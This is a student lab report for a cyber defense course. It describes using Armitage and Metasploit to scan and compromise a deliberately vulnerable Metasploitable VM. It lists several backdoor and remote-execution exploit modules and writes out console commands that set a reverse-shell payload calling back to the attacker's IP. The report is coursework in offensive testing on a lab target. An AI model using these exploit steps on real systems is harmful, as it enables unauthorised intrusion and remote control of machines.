cs 6055 - cyber defense overview lab 2 report
TRANSCRIPT
CS 6055 - CYBER DEFENSE OVERVIEWLAB 2 REPORT
Objective:
To report all the suspicious findings in the given operating system .
Procedure:
Step-1:
The database server used by Metasploit and the Armitage are started.
Step-2:
Nmap scan is performed to detect the Operating Systems. IP address of Metasploitable(192.168.56.101) is given. The operating system is now detected and is visible in Armitage.
Step-3:
Attacks -> Find attacks
The Armitage GUI finds all the attacks. Now an "attack" menu is attached to the detected OS.We can now find all the attacks that are possible.
Step-4:
Hail Mary launches a flood of attacks and some vulnerabilities are found. I found some othervulnerabilities by trial and error. The list of the exploits I found using Hail Mary are:
exploit/multi/http/php_cgi_arg_injection
exploit/unix/ftp/vstfpd_234_backdoor
exploit/unix/irc/unreal_ircd_3281_backdoor
CS 6055 - CYBER DEFENSE OVERVIEWLAB 2 REPORT
CS 6055 - CYBER DEFENSE OVERVIEWLAB 2 REPORT
By trail and error
exploit/linux/misc/drb_remote_codexec
exploit/multi/samba/usermap_script
exploit/misc/distcc_exec
exploit/multi/misc/java_rmi_server
CS 6055 - CYBER DEFENSE OVERVIEWLAB 2 REPORT
Launching of the attacks found by trail and error manually creates a shell for each attack. Theattacks are launched manually by double clicking on them. The below screenshots show thelaunching and the respective opened shells.
CS 6055 - CYBER DEFENSE OVERVIEWLAB 2 REPORT
exploit/multi/samba/usermap_script
exploit/misc/distcc_exec
CS 6055 - CYBER DEFENSE OVERVIEWLAB 2 REPORT
exploit/multi/misc/java_rmi_server
The vulnerability exploit/linux/misc/drb_remote_codexec is executed manually by using thefollowing commands.
set URI druby://192.168.56.101:8787 (the URI is set to the victim’s IP address and the port usedis 8787)
CS 6055 - CYBER DEFENSE OVERVIEWLAB 2 REPORT
set payload cmd/unix/reverse (the payload is set to this path)
set LHOST 192.168.56.102 (set the LHOST to the attacker’s IP address)
set LPORT 8080 (the Local port is set to 8080)
exploit (used to launch the attack)
Then the attack is launched and the corresponding shell is opened
CS 6055 - CYBER DEFENSE OVERVIEWLAB 2 REPORT
exploit/linux/misc/drb_remote_codexec
The commands used in the shell will give the details of Metasploitable OS. The commands usedare:
hostname - It gives the name of the host you are connected to; in this case the host ismetasploitable.
whoami – Print the username associated with the current effective user ID.
cd / - It changes the directory.
ls – It gives the list of all the files.
I used these basic commands to show that I am able to get into the metasploitable OS with thisprocess.